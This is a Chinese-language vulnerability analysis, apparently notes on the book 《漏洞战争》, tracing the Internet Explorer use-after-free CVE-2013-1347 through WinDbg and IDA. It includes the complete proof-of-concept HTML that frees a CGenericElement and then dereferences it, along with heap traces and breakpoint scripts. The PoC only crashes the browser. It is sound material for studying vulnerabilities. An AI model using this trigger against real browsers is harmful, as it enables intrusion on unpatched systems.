  • 释放重引用漏洞(来自《漏洞战争》一书)

    1.简介

    基本问题是: 堆内存被释放后, 指向它的指针(悬垂指针)仍然存在; 之后再次申请堆内存时, 新申请的内存可能与刚释放的内存有重合的部分,

    此时通过旧指针操作就会读写到新申请内存中的数据. 例如在堆中创建一个对象并让 p 指向它, 该对象释放后又重新申请了堆内存, 而且这2次内存有重合的部分,

    如果新内存的内容可控, 且程序又引用了 p(如通过它调用虚函数), 即可能执行任意代码

    2.CVE-2013-1347-Microsoft IE CGenericElement 释放重引用漏洞

    根据poc代码分析漏洞

    将ie加载到windbg后,开启hpa(页堆): gflags.exe -i iexplore.exe +hpa

    继续运行并加载poc后断下:

    0:024> g
    (6f4.8fc): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=72389100 ebx=1679afb0 ecx=1824afc8 edx=00000000 esi=084eccb0 edi=00000000
    eip=7200b68d esp=084ecc84 ebp=084ecc9c iopl=0 nv up ei pl zr na pe nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
    mshtml!CElement::Doc:
    7200b68d 8b01 mov eax,dword ptr [ecx] ds:002b:1824afc8=????????

    由于是在开启hpa的情况下断下的,所以可以用 !heap -p -a 查看ecx所指内存块的详细信息(包括它被释放时的调用栈):

    0:005> !gflag
    Current NtGlobalFlag contents: 0x02000000
    hpa - Place heap allocations at ends of pages
    0:005> !heap -p -a ecx
    address 1824afc8 found in
    _DPH_HEAP_ROOT @ 1b1000
    in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
    18162340: 1824a000 2000
    746c90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
    779b1464 ntdll!RtlDebugFreeHeap+0x0000002f
    7796ab3a ntdll!RtlpFreeHeap+0x0000005d
    77913472 ntdll!RtlFreeHeap+0x00000142
    767014dd kernel32!HeapFree+0x00000014
    71f5c83a mshtml!CGenericElement::`vector deleting destructor'+0x0000003d
    72011daf mshtml!CBase::SubRelease+0x00000022
    7200a6b5 mshtml!CElement::PrivateRelease+0x0000002a
    72007894 mshtml!PlainRelease+0x00000025
    72053862 mshtml!PlainTrackerRelease+0x00000014
    7329a735 jscript!VAR::Clear+0x0000005f
    732b6e46 jscript!GcContext::Reclaim+0x000000b6
    732b43e9 jscript!GcContext::CollectCore+0x00000123

    由调用栈中的 mshtml!CGenericElement::`vector deleting destructor' 一行可知, ecx所指的这个CGenericElement对象已经被析构并释放, 此处是对已释放内存的重引用

    崩溃点之前的反汇编(ub 列出的是 eip 之前的指令):

    0:005> ub
    ; ub lists the instructions *before* eip, so this is the tail of CElement::SecurityContext,
    ; not the faulting instruction itself (7200b68d mov eax,dword ptr [ecx] in CElement::Doc,
    ; see the exception record above).
    mshtml!CElement::SecurityContext+0x22:
    7200b681 8b01 mov eax,dword ptr [ecx]    ; author's note: ecx is clearly the this pointer, eax the vtable pointer
    7200b683 8b5070 mov edx,dword ptr [eax+70h]   ; load virtual slot 0x70/4 = 28
    7200b686 ffe2 jmp edx                    ; tail-call through that slot
    7200b688 90 nop                          ; presumably alignment padding before CElement::Doc at 7200b68d
    7200b689 90 nop
    7200b68a 90 nop
    7200b68b 90 nop
    7200b68c 90 nop

    回到poc中:

    <!doctype html> <!-- required -->
    <!-- PoC for CVE-2013-1347 as quoted from the book. From the debugger output on this page:
         CollectGarbage() ends up freeing a CGenericElement (apparently the <datalist>) via
         jscript!GcContext::CollectCore -> CBase::SubRelease -> CGenericElement::`vector deleting destructor',
         and a stale pointer to that object is then dereferenced in mshtml!CElement::Doc (mov eax,[ecx]). -->
    <HTML>
    <head>
    </head>
    <body>
    <ttttt:whatever id="myanim"/><!-- required format -->
    <script>
        f0=document.createElement('span');// this element-creation function is reverse-engineered below (CDocument::createElement -> CreateElementHelper -> CMarkup::CreateElement -> CSpanElement::CreateElement)
        document.body.appendChild(f0);
    
        f1=document.createElement('span');
        document.body.appendChild(f1);
    
        f2=document.createElement('span');
        document.body.appendChild(f2);
    
        document.body.contentEditable="true";
        f2.appendChild(document.createElement('datalist')); //has to be a data list  (the CtreeNode breakpoint output below shows it is created as a CGenericElement)
        f1.appendChild(document.createElement('table'));    //has to be a table
    
        try{
                f0.offsetParent=null;                       //required  (offsetParent is read-only, hence the try/catch; the access still hits CElement::GetOffsetParentHelper per the breakpoint below)
        }catch(e){  }
    
        f2.innerHTML="";                                    //required
        f0.appendChild(document.createElement('hr'));       //required
        f1.innerHTML="";                                    //required
        CollectGarbage();                                   // triggers the free shown in the !heap -p -a stack above
     </script>
    </body>
    </html>

    先查询一下符号:

    0:005> x mshtml!*document*createElement*
    71f65e8d mshtml!CDocument::createElement = <no type information>
    72016ec0 mshtml!s_methdescCDocumentcreateElement = <no type information>
    71f65ee6 mshtml!CDocument::CreateElementHelper = <no type information>

    在ida中定位函数CDocument::createElement, 发现其底层调用了CDocument::CreateElementHelper 

    跟进该函数:

    又调用了CMarkup::CreateElement(ELEMENT_TAG,CElement * *,ushort *,long) 函数创建元素

    继续跟进发现该函数很庞大, 直接找call, 看还有没有更深层次的创建元素的函数, 发现有一处:

     CreateElement(struct CHtmTag *, struct CElement **, struct CDoc *, struct CMarkup *, int *, unsigned __int32)

     继续跟进该函数.

    这里其实有2个同名函数(可能是参数不同的重载, windbg 报 Ambiguous symbol 也是因为这一点; 也可能是ida,windbg或者符号文件的问题),书上讲的是71f9141a 这个,而我用ida跟进时却是71fcd6de .这不知道是怎么回事

    0:005> dd mshtml!createelement
    Matched: 71f9141a mshtml!CreateElement = <no type information>
    Matched: 71fcd6de mshtml!CreateElement = <no type information>
    Ambiguous symbol error at 'mshtml!createelement'

    mov eax, ecx  ; author's note: unclear whether ecx is a this pointer here, since ecx is never assigned inside this function
    ; NOTE(review): in the windbg listing of (what appears to be) the same routine further down, this shift is fed by `movzx eax,byte ptr [edi+1]`, so the value is most likely the element tag index rather than a this pointer — confirm against the caller
    .text:74D6143A shl eax, 4  ; author's note: if ecx were a this pointer this shift makes no sense, and this is a module-level global function, not a member function. (x16: each CTagDesc table entry is presumably 16 bytes)
    .text:74D6143D add eax, offset ?g_atagdesc@@3QBVCTagDesc@@B ; CTagDesc const * const g_atagdesc ; eax = &g_atagdesc[index]
    .text:74D61442 jz loc_74EB3FF6            ; ZF comes from the add above (target not shown here)
    .text:74D61448 mov [ebp+var_84], edi ; edi==0
    .text:74D6144E mov byte ptr [ebp+var_84+1], cl   ; low byte of the index stored into the local structure
    .text:74D61454 lea ecx, [ebp+arg_8]
    .text:74D61457 push ecx
    .text:74D61458 push edx
    .text:74D61459 mov edx, [eax+8]           ; function pointer at +8 of the CTagDesc entry
    .text:74D6145C lea ecx, [ebp+var_84]
    .text:74D61462 push ecx
    .text:74D61463 mov [ebp+var_80], edi
    .text:74D61466 call edx                   ; per-tag CreateElement (the `ln eax` breakpoint output below names CSpanElement::CreateElement, CTable::CreateElement, ...)

    ?g_atagdesc@@3QBVCTagDesc@@B 是 g_atagdesc(一个 CTagDesc 数组)的修饰名, 结合 shl eax,4 可以推测这里是按标签号索引 16 字节大小的 CTagDesc 表项, 再通过表项中的函数指针调用对应元素类的创建函数

     直接来到span元素的createelement函数:

    .text:74D18F8C mov edi, edi               ; Microsoft hot-patchable function entry (2-byte nop)
    .text:74D18F8E push ebp
    .text:74D18F8F mov ebp, esp
    .text:74D18F91 push esi
    .text:74D18F92 push 28h ; dwBytes         ; the object is allocated with 0x28 bytes
    .text:74D18F94 push 8 ; dwFlags           ; HEAP_ZERO_MEMORY
    .text:74D18F96 push _g_hProcessHeap ; hHeap
    .text:74D18F9C call ds:__imp__HeapAlloc@12 ; HeapAlloc(x,x,x); allocate the element's memory
    .text:74D18FA2 mov esi, eax               ; esi = new object, or NULL
    .text:74D18FA4 test esi, esi
    .text:74D18FA6 jz short loc_74D18FD2 ; author's note: if the allocation returned 0, eax is cleared and the function returns (loc_74D18FD2 is not shown here)
    .text:74D18FA8 push [ebp+arg_4]           ; CDoc*
    .text:74D18FAB push 5Bh                   ; ELEMENT_TAG value for this element
    .text:74D18FAD call ??0CElement@@QAE@W4ELEMENT_TAG@@PAVCDoc@@@Z ; CElement::CElement(ELEMENT_TAG,CDoc *); base-class constructor (how this/ecx is passed is not visible in this excerpt)
    .text:74D18FB2 mov dword ptr [esi], offset ??_7CSpanElement@@6B@ ; const CSpanElement::`vftable' ; install the derived-class vtable after the base ctor
    .text:74D18FB8 mov eax, esi
    .text:74D18FBA
    .text:74D18FBA loc_74D18FBA: ; CODE XREF: CSpanElement::CreateElement(CHtmTag *,CDoc *,CElement * *)+48j
    .text:74D18FBA mov ecx, [ebp+arg_8]       ; CElement** out-parameter
    .text:74D18FBD mov [ecx], eax             ; *ppElement = new object (presumably NULL when reached from the failure path)
    .text:74D18FBF neg eax                    ; CF = (eax != 0)
    .text:74D18FC1 sbb eax, eax               ; eax = (object != NULL) ? 0xFFFFFFFF : 0
    .text:74D18FC3 and eax, 7FF8FFF2h
    .text:74D18FC8 add eax, 8007000Eh         ; 0x7FF8FFF2 + 0x8007000E wraps to 0 -> returns S_OK on success, E_OUTOFMEMORY (0x8007000E) on NULL; branchless HRESULT selection
    .text:74D18FCD pop esi
    .text:74D18FCE pop ebp
    .text:74D18FCF retn 0Ch                   ; __stdcall, three dword arguments

    对其父类构造函数下记录断点:

    0:013> bl
    0 e 71fc9ff1 0001 (0001) 0:**** mshtml!CElement::CElement+0x1e ".echo '--- CElement --- ';dd edi l(28/4);gc"
    0:013> bu mshtml!createelement
    Matched: 71f9141a mshtml!CreateElement = <no type information>
    Matched: 71fcd6de mshtml!CreateElement = <no type information>
    Ambiguous symbol error at 'mshtml!createelement'
    0:013> bp 71fcd715 "ln eax;gc"


    0:013> g
    '--- CElement --- '
    0adb2fd8 71e55570 00000001 00000008 00000000
    0adb2fe8 00000000 00000000 00000000 00000000
    0adb2ff8 00000000 00000000
    (71f977d2) mshtml!CCommentElement::CreateElement | (71f97880) mshtml!`string'
    Exact matches:
    mshtml!CCommentElement::CreateElement = <no type information>
    '--- CElement --- '
    0ab01fc8 71e55570 00000001 00000008 00000000
    0ab01fd8 00000000 00000000 00000000 00000000
    0ab01fe8 00000000 00000000
    (71f977d2) mshtml!CCommentElement::CreateElement | (71f97880) mshtml!`string'
    Exact matches:
    mshtml!CCommentElement::CreateElement = <no type information>
    '--- CElement --- '
    0b4a2fc8 71e55570 00000001 00000008 00000000
    0b4a2fd8 00000000 00000000 00000000 00000000
    0b4a2fe8 00000000 00000000
    (71f91547) mshtml!CHtmlElement::CreateElement | (71f91598) mshtml!CHtmlElement::`vftable'
    Exact matches:
    mshtml!CHtmlElement::CreateElement = <no type information>
    '--- CElement --- '
    0a920fd8 71e55570 00000001 00000008 00000000
    0a920fe8 00000000 00000000 00000000 00000000
    0a920ff8 00000000 00000000
    (71f9181d) mshtml!CHeadElement::CreateElement | (71f91868) mshtml!CHeadElement::`vftable'
    Exact matches:
    mshtml!CHeadElement::CreateElement = <no type information>
    '--- CElement --- '
    0b786fd8 71e55570 00000001 00000008 00000000
    0b786fe8 00000000 00000000 00000000 00000000
    0b786ff8 00000000 00000000
    '--- CElement --- '
    0b0e2fd0 71e55570 00000001 00000008 00000000
    0b0e2fe0 00000000 00000000 00000000 00000000
    0b0e2ff0 00000000 00000000
    (71f90bba) mshtml!CBodyElement::CreateElement | (71f90c08) mshtml!CBodyElement::CBodyElement
    Exact matches:
    mshtml!CBodyElement::CreateElement = <no type information>
    '--- CElement --- '
    0c2a8fd0 71e55570 00000001 00000008 00000000
    0c2a8fe0 00000000 00000000 00000000 00000000
    0c2a8ff0 00000000 00000000
    '--- CElement --- '
    0b7d9fd0 71e55570 00000001 00000008 00000000
    0b7d9fe0 00000000 00000000 00000000 00000000
    0b7d9ff0 00000000 00000000
    (71f977d2) mshtml!CCommentElement::CreateElement | (71f97880) mshtml!`string'
    Exact matches:
    mshtml!CCommentElement::CreateElement = <no type information>
    '--- CElement --- '
    0ac9ffc8 71e55570 00000001 00000008 00000000
    0ac9ffd8 00000000 00000000 00000000 00000000
    0ac9ffe8 00000000 00000000
    (71fef96d) mshtml!CScriptElement::CreateElement | (71fef9b7) mshtml!CScriptElement::CScriptElement
    Exact matches:
    mshtml!CScriptElement::CreateElement = <no type information>
    '--- CElement --- '
    0b6a8f98 71e55570 00000001 00000008 00000000
    0b6a8fa8 00000000 00000000 00000000 00000000
    0b6a8fb8 00000000 00000000
    ModLoad: 747b0000 74862000 C:\Windows\SysWOW64\jscript.dll
    eax=00000000 ebx=00000000 ecx=00000000 edx=00000000 esi=7ef99000 edi=0863c070
    eip=778ffc52 esp=0863bf44 ebp=0863bf98 iopl=0 nv up ei pl zr na pe nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
    ntdll!ZwMapViewOfSection+0x12:
    778ffc52 83c404 add esp,4
    0:005> g
    (71f48f8c) mshtml!CSpanElement::CreateElement | (71f48fd8) mshtml!CSpanElement::`vftable'
    Exact matches:
    mshtml!CSpanElement::CreateElement = <no type information>
    '--- CElement --- '
    0b722fd8 71e55570 00000001 00000008 00000000
    0b722fe8 00000000 00000000 00000000 00000000
    0b722ff8 00000000 00000000
    (71f48f8c) mshtml!CSpanElement::CreateElement | (71f48fd8) mshtml!CSpanElement::`vftable'
    Exact matches:
    mshtml!CSpanElement::CreateElement = <no type information>
    '--- CElement --- '
    0c078fd8 71e55570 00000001 00000008 00000000
    0c078fe8 00000000 00000000 00000000 00000000
    0c078ff8 00000000 00000000
    (71f48f8c) mshtml!CSpanElement::CreateElement | (71f48fd8) mshtml!CSpanElement::`vftable'
    Exact matches:
    mshtml!CSpanElement::CreateElement = <no type information>
    '--- CElement --- '
    09c0cfd8 71e55570 00000001 00000008 00000000
    09c0cfe8 00000000 00000000 00000000 00000000
    09c0cff8 00000000 00000000
    (71f5c4de) mshtml!CGenericElement::CreateElement | (71f5c523) mshtml!CGenericElement::CGenericElement
    Exact matches:
    mshtml!CGenericElement::CreateElement = <no type information>
    '--- CElement --- '
    0acb3fc8 71e55570 00000001 00000008 00000000
    0acb3fd8 00000000 00000000 00000000 00000000
    0acb3fe8 00000000 00000000
    (71f3a55d) mshtml!CTable::CreateElement | (71f3a59e) mshtml!CTable::CTable
    Exact matches:
    mshtml!CTable::CreateElement = <no type information>
    '--- CElement --- '
    0b5edfb8 71e55570 00000001 00000008 00000000
    0b5edfc8 00000000 00000000 00000000 00000000
    0b5edfd8 00000000 00000000
    (71f2d66d) mshtml!CHRElement::CreateElement | (71f2d6c3) mshtml!CHRElement::ApplyDefaultFormat
    Exact matches:
    mshtml!CHRElement::CreateElement = <no type information>
    '--- CElement --- '
    0c05efd8 71e55570 00000001 00000008 00000000
    0c05efe8 00000000 00000000 00000000 00000000
    0c05eff8 00000000 00000000
    (be0.1b0): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=72389100 ebx=0b461fb0 ecx=0acb3fc8 edx=00000000 esi=0863cdc8 edi=00000000
    eip=7200b68d esp=0863cd9c ebp=0863cdb4 iopl=0 nv up ei pl zr na pe nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
    mshtml!CElement::Doc:
    7200b68d 8b01 mov eax,dword ptr [ecx] ds:002b:0acb3fc8=????????

    经过调试后可见代码中:

    71fcd6fa 0fb64701 movzx eax,byte ptr [edi+1]  ; zero-extend the byte at [edi+1] into eax (high bits cleared); presumably the element tag index
    71fcd6fe c1e004 shl eax,4  ; x16 — the low 4 bits become 0; each table entry is 16 bytes
    71fcd701 0520390272 add eax,offset mshtml!g_atagdesc (72023920);eax = &g_atagdesc[index]. author's note: these 3 instructions fetch the corresponding vtable — NOTE(review): g_atagdesc is declared as a CTagDesc array (see the IDA comment above), so this is a tag-descriptor entry rather than a vtable
    71fcd706 0f8405691100 je mshtml!CreateElement+0x2b (720e4011)   ; ZF from the add above
    71fcd70c 8b4008 mov eax,dword ptr [eax+8];author's note: eax+8 should be the vtable — more likely the entry's CreateElement function pointer, given what the `ln eax` breakpoint at 71fcd715 prints
    71fcd70f 8d4d10 lea ecx,[ebp+10h]
    71fcd712 51 push ecx
    71fcd713 52 push edx
    71fcd714 57 push edi
    71fcd715 ffd0 call eax;resolve eax here: it is some element class's CreateElement function address

    然后再看appendChild

    0:005> x mshtml!*appendChild*
    71f65acf mshtml!CElement::appendChild = <no type information>
    721b1590 mshtml!CAttribute::appendChild = <no type information>
    721b09f4 mshtml!CDOMTextNode::appendChild = <no type information>
    7209d1d8 mshtml!s_methdescCAttributeappendChild = <no type information>
    7201d720 mshtml!s_methdescCElementappendChild = <no type information>
    71f6d65e mshtml!CDocument::appendChild = <no type information>

    该函数没有分支,调用了CElement::insertBefore(IHTMLDOMNode *,tagVARIANT,IHTMLDOMNode * *)

     继续跟进: 调用了CElement::InsertBeforeHelper(IUnknown *,IUnknown *)

    对该函数下断,然后单步跟踪:

    0:005>
    eax=00000000 ebx=0be7af30 ecx=00000000 edx=00000007 esi=11652fd8 edi=00000000
    eip=70cb5c14 esp=086fb234 ebp=086fb290 iopl=0 nv up ei pl nz ac po nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212
    mshtml!CElement::InsertBeforeHelper+0xb8:
    70cb5c14 56 push esi
    0:005>
    eax=00000000 ebx=0be7af30 ecx=00000000 edx=00000007 esi=11652fd8 edi=00000000
    eip=70cb5c15 esp=086fb230 ebp=086fb290 iopl=0 nv up ei pl nz ac po nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212
    mshtml!CElement::InsertBeforeHelper+0xb9:
    70cb5c15 e831000000 call mshtml!CElement::GetDOMInsertPosition (70cb5c4b)

    将GetDOMInsertPosition 函数放在ida中查看参数,esi是某对象指针

    继续:

    eax=086fb5c4 ebx=0be7af30 ecx=00000000 edx=00000000 esi=11652fd8 edi=117cefd8
    eip=70cb5c25 esp=086fb5b4 ebp=086fb610 iopl=0 nv up ei pl zr na pe nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
    mshtml!CElement::InsertBeforeHelper+0xc9:
    70cb5c25 ff75f0 push dword ptr [ebp-10h] ss:002b:086fb600=00000000
    0:005>
    eax=086fb5c4 ebx=0be7af30 ecx=00000000 edx=00000000 esi=11652fd8 edi=117cefd8
    eip=70cb5c28 esp=086fb5b0 ebp=086fb610 iopl=0 nv up ei pl zr na pe nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
    mshtml!CElement::InsertBeforeHelper+0xcc:
    70cb5c28 e88dfdffff call mshtml!CCommentElement::`scalar deleting destructor'+0x17c (70cb59ba) ;这里书上是unicodecharactercount 可能是符号文件的问题

    跟进:

    0:005>
    eax=086fb5c4 ebx=0be7af30 ecx=117cefd8 edx=00000000 esi=11652fd8 edi=117cefd8
    eip=70cb59cd esp=086fb528 ebp=086fb5a8 iopl=0 nv up ei pl nz na pe nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
    mshtml!CCommentElement::`scalar deleting destructor'+0x18f:
    70cb59cd e8bb5c0a00 call mshtml!CElement::Doc (70d5b68d)
    0:005>
    eax=09650680 ebx=0be7af30 ecx=117cefd8 edx=70d5b65d esi=11652fd8 edi=117cefd8
    eip=70cb59d2 esp=086fb528 ebp=086fb5a8 iopl=0 nv up ei pl zr na pe nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
    mshtml!CCommentElement::`scalar deleting destructor'+0x194:
    70cb59d2 8b4f1c mov ecx,dword ptr [edi+1Ch] ds:002b:117ceff4=02010000
    0:005> ln eax
    0:005> ln poi(eax)
    (70d52028) mshtml!CDoc::`vftable' | (70d5fc58) mshtml!CDoc::`vftable'
    Exact matches:
    mshtml!CDoc::`vftable' = <no type information>

    又来到

    70c9ad8b 6a01 push 1
    0:005>
    eax=086fb5c4 ebx=0be7af30 ecx=00000000 edx=70d5b65d esi=09650680 edi=117cefd8
    eip=70c9ad8d esp=086fb524 ebp=086fb5a8 iopl=0 nv up ei ng nz na pe cy
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000287
    mshtml!CCommentElement::`scalar deleting destructor'+0x229:
    70c9ad8d 6a00 push 0
    0:005>
    eax=086fb5c4 ebx=0be7af30 ecx=00000000 edx=70d5b65d esi=09650680 edi=117cefd8
    eip=70c9ad8f esp=086fb520 ebp=086fb5a8 iopl=0 nv up ei ng nz na pe cy
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000287
    mshtml!CCommentElement::`scalar deleting destructor'+0x22b:
    70c9ad8f 57 push edi
    0:005>
    eax=086fb5c4 ebx=0be7af30 ecx=00000000 edx=70d5b65d esi=09650680 edi=117cefd8
    eip=70c9ad90 esp=086fb51c ebp=086fb5a8 iopl=0 nv up ei ng nz na pe cy
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000287
    mshtml!CCommentElement::`scalar deleting destructor'+0x22c:
    70c9ad90 e8f4feffff call mshtml!CDoc::InsertElement (70c9ac89)

    继续跟进

    尾部调用了mshtml!CMarkup::InsertElementInternal 

    mshtml!CDoc::InsertElement+0x84:
    70c9ad0f 57 push edi
    0:005>
    eax=086fb4fc ebx=11f32fe0 ecx=1122cf30 edx=00000001 esi=086fb508 edi=1122cf30
    eip=70c9ad10 esp=086fb4e0 ebp=086fb514 iopl=0 nv up ei pl zr na pe nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
    mshtml!CDoc::InsertElement+0x85:
    70c9ad10 e8bc010000 call mshtml!CMarkup::InsertElementInternal (70c9aed1)

    跟进直到:

    eax=0cdc8fb0 ebx=00000000 ecx=00000000 edx=00000000 esi=086fb508 edi=086fb4fc
    eip=70c9b073 esp=086fb444 ebp=086fb4d8 iopl=0 nv up ei pl zr na pe nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
    mshtml!CMarkup::InsertElementInternal+0x205:
    70c9b073 8b442418 mov eax,dword ptr [esp+18h] ss:002b:086fb45c=0cdc8fb0
    0:005>
    eax=0cdc8fb0 ebx=00000000 ecx=00000000 edx=00000000 esi=086fb508 edi=086fb4fc
    eip=70c9b077 esp=086fb444 ebp=086fb4d8 iopl=0 nv up ei pl zr na pe nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
    mshtml!CMarkup::InsertElementInternal+0x209:
    70c9b077 e8a7fdffff call mshtml!CMarkup::SearchBranchForNodeInStory (70c9ae23)

    查看一下参数
    0:005> dd eax
    0cdc8fb0 11652fd8 00000000 00000252 00020003
    0cdc8fc0 00000051 00000000 11bfafc0 0cdc8fd8
    0cdc8fd0 00000000 11bfafc0 00000062 00000000
    0cdc8fe0 11f32fe0 11bfafd8 11f32fe0 00000000
    0cdc8ff0 00000008 00000000 00000000 d0d0d0d0
    0cdc9000 ???????? ???????? ???????? ????????
    0cdc9010 ???????? ???????? ???????? ????????
    0cdc9020 ???????? ???????? ???????? ????????
    0:005> dd poi(eax)
    11652fd8 70cd2010 00000001 00000008 00000000
    11652fe8 00000000 0cdc8fb0 00000052 80006200
    11652ff8 00000004 1122cf30 ???????? ????????
    11653008 ???????? ???????? ???????? ????????
    11653018 ???????? ???????? ???????? ????????
    11653028 ???????? ???????? ???????? ????????
    11653038 ???????? ???????? ???????? ????????
    11653048 ???????? ???????? ???????? ????????

    又是一个对象

    0:005> ln 70cd2010
    (70cd2010) mshtml!CRootElement::`vftable' | (70d5a050) mshtml!CDisplayPointer::`vftable'
    Exact matches:
    mshtml!CRootElement::`vftable' = <no type information>

    70c9b088 6a4c push 4Ch
    70c9b08a 6a08 push 8
    70c9b08c ff3518840d71 push dword ptr [mshtml!g_hProcessHeap (710d8418)]
    70c9b092 ff150013ba70 call dword ptr [mshtml!_imp__HeapAlloc (70ba1300)]

    继续:

    70c9b0a3 53 push ebx
    70c9b0a4 ff742410 push dword ptr [esp+10h]
    70c9b0a8 8bc8 mov ecx,eax
    70c9b0aa e80a970c00 call mshtml!CTreeNode::CTreeNode (70d647b9)
    70c9b0af 8bf0 mov esi,eax  ;查看返回的eax:

    0:005> dd eax
    11790fb0 117cefd8 0cdc8fb0 ffff001f ffffffff
    11790fc0 00000000 00000000 00000000 00000000
    11790fd0 00000000 00000000 00000000 00000000
    11790fe0 00000000 00000000 00000000 00000000
    11790ff0 00000008 00000000 00000000 d0d0d0d0
    11791000 ???????? ???????? ???????? ????????
    11791010 ???????? ???????? ???????? ????????
    11791020 ???????? ???????? ???????? ????????
    0:005> dd 117cefd8
    117cefd8 70cd0a90 00000002 00000008 00000000
    117cefe8 13052ba0 00000000 8000001f 02010000
    117ceff8 00000000 0be78fe8 ???????? ????????
    117cf008 ???????? ???????? ???????? ????????
    117cf018 ???????? ???????? ???????? ????????
    117cf028 ???????? ???????? ???????? ????????
    117cf038 ???????? ???????? ???????? ????????
    117cf048 ???????? ???????? ???????? ????????
    0:005> ln 70cd0a90
    (70cd0a90) mshtml!CDivElement::`vftable' | (70d7cb74) mshtml!`string'
    Exact matches:
    mshtml!CDivElement::`vftable' = <no type information>

    现在能找到被append的对象了,然后记录断点:

    bp mshtml!CMarkup::InsertElementInternal+0x2a4 ".echo '--cTreeNode--';dd eax l1;dps poi(eax);gc"

    重新调试, 然后把这2个断点都设置上:

    0:000> bl
    0 d 71839ff1 0001 (0001) 0:**** mshtml!CElement::CElement+0x1e ".echo '--- CElement --- ';dd edi l(28/4);gc"
    1 e 717bb175 0001 (0001) 0:**** mshtml!CMarkup::InsertElementInternal+0x329 ".echo '--cTreeNode--';dd eax l1;dps poi(eax);gc"

    0:000> bl
    0 d 70d19ff1 0001 (0001) 0:**** mshtml!CElement::CElement+0x1e ".echo '--- CElement --- ';dd edi l(28/4);gc"
    1 e 70c9b0af 0001 (0001) 0:**** mshtml!CMarkup::InsertElementInternal+0x23d ".echo '--CtreeNode--';dd eax l1;dps poi(eax) l1;gc"

    继续运行:

    '--- CElement --- '
    0be92fd8 74805570 00000001 00000008 00000000
    0be92fe8 00000000 00000000 00000000 00000000
    0be92ff8 00000000 00000000
    '--- CElement --- '
    0b377fc8 74805570 00000001 00000008 00000000
    0b377fd8 00000000 00000000 00000000 00000000
    0b377fe8 00000000 00000000
    '--- CElement --- '
    0b50cfc8 74805570 00000001 00000008 00000000
    0b50cfd8 00000000 00000000 00000000 00000000
    0b50cfe8 00000000 00000000
    '--- CElement --- '
    0aaaafd8 74805570 00000001 00000008 00000000
    0aaaafe8 00000000 00000000 00000000 00000000
    0aaaaff8 00000000 00000000
    '--- CElement --- '
    0b7c4fd8 74805570 00000001 00000008 00000000
    0b7c4fe8 00000000 00000000 00000000 00000000
    0b7c4ff8 00000000 00000000
    '--- CElement --- '
    0b193fd0 74805570 00000001 00000008 00000000
    0b193fe0 00000000 00000000 00000000 00000000
    0b193ff0 00000000 00000000
    '--- CElement --- '
    0af9dfd0 74805570 00000001 00000008 00000000
    0af9dfe0 00000000 00000000 00000000 00000000
    0af9dff0 00000000 00000000
    '--- CElement --- '
    0b1fffd0 74805570 00000001 00000008 00000000
    0b1fffe0 00000000 00000000 00000000 00000000
    0b1ffff0 00000000 00000000
    '--- CElement --- '
    0b864fc8 74805570 00000001 00000008 00000000
    0b864fd8 00000000 00000000 00000000 00000000
    0b864fe8 00000000 00000000
    '--- CElement --- '
    0bea6f98 74805570 00000001 00000008 00000000
    0bea6fa8 00000000 00000000 00000000 00000000
    0bea6fb8 00000000 00000000
    ModLoad: 73120000 731d2000 C:\Windows\SysWOW64\jscript.dll
    eax=00000000 ebx=00000000 ecx=00000000 edx=00000000 esi=7ef99000 edi=0856c330
    eip=778ffc52 esp=0856c204 ebp=0856c258 iopl=0 nv up ei pl zr na pe nc
    cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
    ntdll!ZwMapViewOfSection+0x12:
    778ffc52 83c404 add esp,4
    0:005> g
    '--- CElement --- '
    0af34fd8 74805570 00000001 00000008 00000000
    0af34fe8 00000000 00000000 00000000 00000000
    0af34ff8 00000000 00000000
    '--CtreeNode--'
    0ab06fb0 0af34fd8
    0af34fd8 748f8fd8 mshtml!CSpanElement::`vftable'
    '--- CElement --- '
    0ab94fd8 74805570 00000001 00000008 00000000
    0ab94fe8 00000000 00000000 00000000 00000000
    0ab94ff8 00000000 00000000
    '--CtreeNode--'
    0ab00fb0 0ab94fd8
    0ab94fd8 748f8fd8 mshtml!CSpanElement::`vftable'
    '--- CElement --- '
    0ab7afd8 74805570 00000001 00000008 00000000
    0ab7afe8 00000000 00000000 00000000 00000000
    0ab7aff8 00000000 00000000
    '--CtreeNode--'
    089f5fb0 0ab7afd8
    0ab7afd8 748f8fd8 mshtml!CSpanElement::`vftable'
    '--- CElement --- '
    0ac4ffc8 74805570 00000001 00000008 00000000
    0ac4ffd8 00000000 00000000 00000000 00000000
    0ac4ffe8 00000000 00000000
    '--CtreeNode--'
    0ae45fb0 0ac4ffc8
    0ac4ffc8 7490c590 mshtml!CGenericElement::`vftable'  ;书上说这是datalist标签; 根据poc.html, datalist 在 span 之后、table 之前创建, 与这里的输出顺序一致.
    '--- CElement --- '
    0b718fb8 74805570 00000001 00000008 00000000
    0b718fc8 00000000 00000000 00000000 00000000
    0b718fd8 00000000 00000000
    '--CtreeNode--'
    0b790fb0 0b718fb8
    0b718fb8 74806488 mshtml!CTable::`vftable'  ;table标签
    '--- CElement --- '
    0b367fd8 74805570 00000001 00000008 00000000
    0b367fe8 00000000 00000000 00000000 00000000
    0b367ff8 00000000 00000000

    '--CtreeNode--'
    0ae74fb0 0b367fd8
